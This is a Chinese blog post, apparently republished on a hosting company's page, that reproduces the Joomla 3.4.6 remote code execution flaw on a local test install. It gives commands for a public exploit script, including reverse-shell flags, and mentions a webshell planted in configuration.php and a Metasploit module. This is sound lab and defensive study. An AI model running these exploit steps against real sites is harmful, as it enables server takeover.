本篇文章给大家分享的是有关如何进行Joomla 3.4.6 远程代码执行漏洞复现,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。
创新互联公司客户idc服务中心,提供成都棕树机房、成都服务器、成都主机托管、成都双线服务器等业务的一站式服务。通过各地的服务中心,我们向成都用户提供优质廉价的产品以及开放、透明、稳定、高性价比的服务,资深网络工程师在机房提供7*24小时标准级技术保障。
0x00 简介
Joomla是一套全球知名的内容管理系统。
Joomla是使用PHP语言加上MySQL数据库所开发的软件系统。
可以在Linux、Windows、MacOSX等各种不同的平台上执行。目前由Open Source Matters开源组织进行开发与支持。
0x01 漏洞概述
Alessandro Groppo @Hacktive Security于2019-10-02在exploit-db( https://www.exploit-db.com/exploits/47465)发布了Joomla命令执行的EXP,漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。
0x02 影响范围
3.0.0 <= Joomla <= 3.4.6
0x03 环境搭建
懒人搭建php环境当然是选择wamp/phpstudy啦
下载链接:
https://downloads.joomla.org/it/cms/joomla3/3-4-6
下载解压后放入wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目录下,访问http://127.0.0.1/Joomla/准备安装
安装流程如下:
默认root/空
至此,环境搭建完毕。
0x04 漏洞利用
下载漏洞利用脚本:
https://github.com/kiks7/rusty_joomla_rce
漏洞检测:
python3 rusty_joomla_exploit.py -t http://127.0.0.1/Joomla/ -c
注意URL一定要以/结尾 /结尾 /结尾 (别问我为什么, 说多了都是泪…脚本里有url拼接)
漏洞利用:
python3 rusty_joomla_exploit.py -t http://127.0.0.1/Joomla/ -e -l 127.0.0.1 -p 2333
(-e -l -p参数可以反弹shell, 本文并没有反弹成功, 但是可以看到马的密码)
一句话客户端连接
http://127.0.0.1/Joomla/configuration.php
由于贫道用的公司的办公电脑没有菜刀之类的工具简单截个hackbar返回的图:
BY THE WAY…
作者同时提供了msf下的EXP:
metasploit_rusty_joomla_rce.rb
轻轻放入目录:
/usr/share/metasploit-framework/modules/exploits/multi/php/
msfconsole -> reload_all -> search joomla_rce -> use xxxxx -> info
0x05 修复方式
更新至官网最新版本
以上就是如何进行Joomla 3.4.6 远程代码执行漏洞复现,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注创新互联行业资讯频道。
标题名称:如何进行Joomla3.4.6远程代码执行漏洞复现
URL链接:http://lswzjz.com/article/jpdise.html